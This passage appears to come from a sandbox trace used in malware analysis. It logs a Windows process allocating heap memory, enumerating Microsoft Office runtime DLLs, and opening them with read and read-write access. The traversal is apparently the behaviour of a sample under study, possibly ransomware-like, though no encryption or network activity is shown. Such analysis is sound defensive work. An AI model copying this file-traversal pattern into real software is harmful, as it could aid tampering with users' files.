hHeap=0x20000) returned 1 [0099.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0099.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0099.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0099.723] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cce8 [0099.723] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d790 [0099.723] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d6e0 [0099.723] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0099.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d6e0 | out: hHeap=0x20000) returned 1 [0099.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d790 | out: hHeap=0x20000) returned 1 [0099.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cce8 | out: hHeap=0x20000) returned 1 [0099.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0099.723] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d790 [0099.723] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cce8 [0099.723] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd98 [0099.723] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0099.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd98 | out: hHeap=0x20000) returned 1 [0099.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cce8 | out: hHeap=0x20000) returned 1 [0099.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d790 | out: hHeap=0x20000) returned 1 [0099.723] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0099.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0099.723] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0099.724] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0099.724] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0099.724] AreFileApisANSI () returned 1 [0099.724] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0099.724] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c848 [0099.724] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x8c848, cchWideChar=80 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-convert-l1-1-0.dll") returned 80 [0099.724] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-convert-l1-1-0.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd0b8e391, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd0b8e391, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd0d7e20c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x58c0)) returned 1 [0099.724] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c848 | out: hHeap=0x20000) returned 1 [0099.724] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0099.724] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.724] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0099.724] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.724] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.724] FindNextFileW (in: hFindFile=0x786d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd0aa952a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd0aa952a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd0bda864, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ac0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="api-ms-win-crt-environment-l1-1-0.dll", cAlternateFileName="APC00F~1.DLL")) returned 1 [0099.724] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.724] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0099.724] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.724] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69030 [0099.724] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0099.724] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x465f8 [0099.724] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69030 | out: hHeap=0x20000) returned 1 [0099.724] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0099.724] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0099.724] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0099.724] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0099.724] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0099.724] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x465f8 | out: hHeap=0x20000) returned 1 [0099.724] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0099.724] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0099.724] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35050 [0099.724] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.724] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35050 | out: hHeap=0x20000) returned 1 [0099.724] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0099.724] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0099.724] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0099.725] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0099.725] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0099.725] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0099.725] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81638 [0099.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0099.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0099.725] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81ed8 [0099.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81638 | out: hHeap=0x20000) returned 1 [0099.725] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.725] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.725] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.725] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81ed8 | out: hHeap=0x20000) returned 1 [0099.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0099.725] AreFileApisANSI () returned 1 [0099.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-environment-l1-1-0.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-environment-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 84 [0099.725] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0099.725] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.725] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.725] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0099.725] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0099.725] AreFileApisANSI () returned 1 [0099.725] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71620, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 84 [0099.725] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa8) returned 0x5f428 [0099.725] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71620, cbMultiByte=-1, lpWideCharStr=0x5f428, cchWideChar=84 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-environment-l1-1-0.dll") returned 84 [0099.725] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-environment-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-environment-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0099.726] GetFileType (hFile=0x27c) returned 0x1 [0099.726] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0099.726] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0099.726] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0099.727] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0099.727] CloseHandle (hObject=0x27c) returned 1 [0099.727] AreFileApisANSI () returned 1 [0099.727] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71620, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 84 [0099.727] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa8) returned 0x5f428 [0099.727] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71620, cbMultiByte=-1, lpWideCharStr=0x5f428, cchWideChar=84 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-environment-l1-1-0.dll") returned 84 [0099.727] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-environment-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-environment-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0099.727] GetFileType (hFile=0x27c) returned 0x1 [0099.727] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0099.727] CloseHandle (hObject=0x27c) returned 1 [0099.727] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.727] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.727] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0099.727] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0099.727] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0099.728] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.728] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.728] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0099.728] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0099.728] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0099.728] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0099.728] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0099.728] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0099.728] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0099.728] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0099.728] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0099.728] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0099.728] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0099.728] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cea0 [0099.728] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d2c0 [0099.728] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cea0 | out: hHeap=0x20000) returned 1 [0099.728] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0099.728] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0099.728] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d2c0 | out: hHeap=0x20000) returned 1 [0099.728] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d210 [0099.728] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cea0 [0099.728] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d790 [0099.728] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0099.728] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d790 | out: hHeap=0x20000) returned 1 [0099.728] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cea0 | out: hHeap=0x20000) returned 1 [0099.728] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d210 | out: hHeap=0x20000) returned 1 [0099.728] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cfa8 [0099.728] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0099.728] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0099.728] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cfa8 | out: hHeap=0x20000) returned 1 [0099.728] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0099.728] AreFileApisANSI () returned 1 [0099.728] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71620, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 84 [0099.728] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa8) returned 0x5f0b8 [0099.728] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71620, cbMultiByte=-1, lpWideCharStr=0x5f0b8, cchWideChar=84 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-environment-l1-1-0.dll") returned 84 [0099.728] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-environment-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-environment-l1-1-0.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd0aa952a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd0aa952a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd0bda864, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ac0)) returned 1 [0099.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f0b8 | out: hHeap=0x20000) returned 1 [0099.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0099.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0099.729] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.729] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.729] FindNextFileW (in: hFindFile=0x786d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd0aa952a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd0aa952a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd0c99389, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x50c0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="api-ms-win-crt-filesystem-l1-1-0.dll", cAlternateFileName="API-MS~4.DLL")) returned 1 [0099.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0099.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0099.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0099.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68ef0 [0099.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0099.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x463c8 [0099.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68ef0 | out: hHeap=0x20000) returned 1 [0099.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0099.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0099.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0099.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0099.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0099.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x463c8 | out: hHeap=0x20000) returned 1 [0099.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0099.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0099.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35130 [0099.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35130 | out: hHeap=0x20000) returned 1 [0099.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0099.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0099.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0099.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0099.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d0b0 [0099.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0099.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0099.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x819d0 [0099.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0099.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0099.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81d68 [0099.730] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x819d0 | out: hHeap=0x20000) returned 1 [0099.730] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.730] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.730] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.730] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.730] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81d68 | out: hHeap=0x20000) returned 1 [0099.730] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0099.730] AreFileApisANSI () returned 1 [0099.730] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-filesystem-l1-1-0.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-filesystem-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 83 [0099.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0099.730] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.730] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0099.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0099.730] AreFileApisANSI () returned 1 [0099.730] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71620, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83 [0099.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60348 [0099.730] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71620, cbMultiByte=-1, lpWideCharStr=0x60348, cchWideChar=83 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-filesystem-l1-1-0.dll") returned 83 [0099.730] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-filesystem-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-filesystem-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0099.730] GetFileType (hFile=0x27c) returned 0x1 [0099.730] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60348 | out: hHeap=0x20000) returned 1 [0099.731] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0099.731] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0099.731] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0099.731] CloseHandle (hObject=0x27c) returned 1 [0099.731] AreFileApisANSI () returned 1 [0099.731] 